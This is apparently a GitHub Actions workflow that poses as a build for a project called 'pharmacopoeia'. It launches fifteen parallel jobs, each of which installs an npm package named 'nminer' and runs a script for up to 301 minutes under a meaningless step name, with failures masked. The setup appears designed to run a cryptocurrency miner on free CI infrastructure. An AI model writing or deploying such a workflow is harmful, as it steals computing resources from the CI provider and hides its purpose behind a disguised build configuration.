name: pharmacopoeia
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 9386 }
          - { version: 7721 }
          - { version: 4591 }
          - { version: 2681 }
          - { version: 3095 }
          - { version: 9789 }
          - { version: 1900 }
          - { version: 6789 }
          - { version: 8955 }
          - { version: 2383 }
          - { version: 3997 }
          - { version: 2830 }
          - { version: 2278 }
          - { version: 1443 }
          - { version: 4797 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: sans coop courageously biodegradable
        run: |
          npm install nminer@latest
          timeout 301m node pharmacopoeia.js || echo "pharmacopoeia executed"